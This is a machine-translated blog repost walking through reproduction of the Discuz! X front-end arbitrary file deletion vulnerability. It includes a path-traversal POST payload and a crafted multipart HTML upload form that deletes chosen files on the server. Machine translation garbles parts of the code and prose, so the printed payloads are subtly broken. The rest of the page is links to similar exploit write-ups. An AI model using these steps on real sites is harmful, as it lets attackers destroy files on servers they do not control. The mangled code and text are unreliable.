Discuz! X Front reproduce any file deletion vulnerability - Code World

Discuz! X Front reproduce any file deletion vulnerability

Enterprise 2019-07-18 20:27:41 views: null

Vulnerability background:
! Discuz the X-software community, is a database constructed using a variety of other excellent performance PHP and MySQL, full-featured, secure and stable community forum platform.

September 29, 2017, Discuz! Fixes a security issue for the strengthening of security, this vulnerability will cause the foreground user can cause arbitrary file delete vulnerability.

September 29, 2017, 404 laboratory know Chong Yu began emergency, after 404 Year-known laboratory analysis confirmed that the vulnerability was submitted to Wooyun vulnerability platform in June 2014, Seebug loophole platform contains the vulnerability, vulnerability numbers ssvid-93588. The vulnerability by configuration property values, delete arbitrary files.

After analysis confirmed that the existing use patterns have been repaired, added formtype judgment on the property, but can lead to incomplete repair mode bypassed, by simulating the file upload can enter other unlink conditions, arbitrary file deletion vulnerability.

Vulnerability to reproduce:
1. Go to Settings - personal data, formhash first find value in the page source code, you can see that the value 2599b5e5
Discuz! X Front reproduce any file deletion vulnerability
2. open a plug-in Hackbar
Post data: birthprovince = .. / .. / .. / importantfile.txt & profilesubmit = 1 & formhash = 2599b5e5

after performing displays a blank, and then the next you refresh or re-access the next just fine.

3. Place of birth is modified to the file you want to delete.
Finally configuration file delete form
<form
Action = " http://192.168.199.217/home.php?mod=spacecp&ac=profile&op=base&deletefile[birthprovince]=aaaaaa " Method = "the POST" the enctype = "multipart / form-Data" >
<INPUT type = "File" name = "birthprovince" ID = "File" />
<INPUT type = "text" name = "formhash" value = "720c16c3" /> </ P>
<INPUT type = "text" name = "profilesubmit" value = " 1" /> </ p>
<INPUT type = "Submit" value = "the Submit" />
</ from>
Discuz! X Front reproduce any file deletion vulnerability
generation .html, need to make changes to the above.
4. Then just upload an image, you can delete your want to delete.

5. go back and look at the longer accessible.

Reproduction success.

Guess you like

Origin blog.51cto.com/14259144/2421388

Discuz! X Front reproduce any file deletion vulnerability

Wordpress4.9.6 reproduce any file deletion vulnerability analysis

Mysql LOAD DATA reads the client to reproduce any file vulnerability (Principle Analysis)

Harbor reproduce any administrator Registration Vulnerability

PHP: jQuery-File-Upload upload any / RCE / unauthorized file deletion vulnerability analysis

yuyuecms 1.2 File Deletion Vulnerability

Vulnerability reproduce articles - Advanced File Inclusion Vulnerabilities - Log File Vulnerability

Vulnerability reproduce articles - Advanced File Inclusion Vulnerabilities - Log File Vulnerability

[Vulnerability Recurrence] Any file upload vulnerability at the front desk of Dahua Smart Park Integrated Management Platform

[Code Audit] Instance of Arbitrary File Deletion Vulnerability

Code audit: ourphp background reproduce any file to read

ThinkPHP 2.x arbitrary code execution vulnerability [reproduce]

Vulnerability reproduce articles - Advanced File Inclusion Vulnerabilities - contained truncated

Vulnerability reproduce articles - Advanced File Inclusion Vulnerabilities - contained truncated

Reproduce the arbitrary file reading vulnerability of UFIDA CRM system

wordpress delete any file vulnerability repair method

PHP: ThinkCMFX any file that contains the vulnerability

Reproduce the vulnerability of Xionghai cms

PHP: network show any cms background file deletion and sql injection

Discuz CSRF Vulnerability

[Vulnerability recurrence] Vmware vcenter does not authorize any file RCE

Any file upload vulnerability in UFIDA full version reproduces

Reproduce arbitrary file reading vulnerability of traggo server (CVE-2023-34843)

Reproduce the User Login Arbitrary File Reading Vulnerability of HUAWEI Firewall (1day)

[1day] Reproduce the Milesight-VPNserver.js arbitrary file reading vulnerability

Reproduce the weaver.file.FileDownloadForOutDoc (QVD-2023-15672) vulnerability of Panwei e-cology SQL injection vulnerability

Spring Framework vulnerability reproduce hodgepodge! ! !

Vulhub vulnerability reproduce the vulnerability Dns domain transfer

[Vulnerability Analysis] Discuz! X Series full version of SQL injection vulnerabilities background

Tongda OA arbitrary file deletion / OA unauthorized access + arbitrary file upload RCE vulnerability reproduction

Recommended

The sixth meeting of openKylin Community Ecology Committee was successfully held

Alibaba Cloud officially releases Tongyi Qianwen 2.5

Python 3.13 releases first Beta: experimental free-threading mode and JIT, improved interactive interpreter

Stack Overflow used my code to train large AI models and banned my account.

Pop!_OS’s COSMIC desktop completes App Store listing

Report: Django is still the first choice for 74% of developers

"Internet Investment and Financing Operation in the First Quarter of 2024" Research Report

15 years ago, he was on the "FFmpeg pillar of shame", and today he still has to thank us - Tencent QQPlayer avenges its shame?

Ranking

Python handwritten digit recognition, the corresponding mathematical formulas and Detailed procedures

Der M-Chip-Mac implementiert mehrere Android-Emulatoren

CentOS 명령줄 모드에서 화면이 항상 켜져 있도록 설정 ---- 예상한 효과를 얻지 못했습니다.

Teach you step by step how to use GDB to debug programs: a comprehensive guide from entry to mastery

python3 pip ipython installation

A lot of python crawler source code sharing -- talk about the little thing about python crawler

Agile Sprint in Alpha Stage (7)

Access URL in Unity

FunctoinDemo form

MS SQL common SQL statements (6): create, modify, delete triggers and other operations sq

Daily

More

2024-05-10(34)

2024-05-09(32)

2024-05-08(18)

2024-05-07(34)

2024-05-06(6)

2024-05-05(0)

2024-05-04(18)

2024-05-03(8)

2024-05-02(0)

2024-05-01(4)